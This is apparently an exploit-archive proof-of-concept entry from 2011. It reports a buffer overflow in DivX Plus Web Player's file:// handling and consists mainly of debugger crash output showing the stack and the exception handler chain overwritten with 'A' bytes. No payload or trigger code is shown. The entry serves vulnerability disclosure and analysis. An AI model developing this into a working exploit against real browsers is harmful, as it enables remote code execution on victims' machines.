# Exploit Title: DivX Plus Web Player "file://" Buffer Overflow Vulnerability PoC ( 0day ) # Date: 10/4/2011 # Author: Snake ( Shahriyar.j < at > gmail ) # Version: DivX Plus Web Player <= 2.1.2.265 # Tested on: XP SP3 , IE6 # CVE : Not Assigned Yet # Ref : http://dl.packetstormsecurity.net/1109-advisories/sa45550.txt This is PoC I wrote for our free BA service in 0days.ir. bug seems simply exploitable ;) (ce8.ca8): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=000007b5 ebx=04634f9e ecx=0000062a edx=0000062b esi=00000041 edi=049ff3ac eip=03d6c62d esp=049ff35c ebp=00000000 iopl=0 nv up ei pl nz ac pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210216 DivXPlaybackModule+0x3c62d: 03d6c62d 6689344f mov word ptr [edi+ecx*2],si ds:0023:04a00000=5a4d 0:010> dd esp 049ff35c 045e56d4 00000000 03d6c8e3 049ffbfc 049ff36c 045e56d0 04634f9e 001f5980 00000000 049ff37c 001eb9e0 00000000 001c5258 00000008 049ff38c 00150178 ffffffff 7c91003d 001c5260 049ff39c 00150000 001ead30 7c8099fd 00000000 049ff3ac 0046002f 002f003a 00410041 00410041 049ff3bc 00410041 00410041 00410041 00410041 049ff3cc 00410041 00410041 00410041 00410041 0:010> dd 049ff3dc 00410041 00410041 00410041 00410041 049ff3ec 00410041 00410041 00410041 00410041 049ff3fc 00410041 00410041 00410041 00410041 049ff40c 00410041 00410041 00410041 00410041 049ff41c 00410041 00410041 00410041 00410041 049ff42c 00410041 00410041 00410041 00410041 049ff43c 00410041 00410041 00410041 00410041 049ff44c 00410041 00410041 00410041 00410041 0:010> !exchain 049ffd9c: iexplore!DllGetLCID+dca7 (00410041) Invalid exception stack at 00410041 also check here for free Persian BA : http://www.0days.ir/article/ -have fun twitter.com/ponez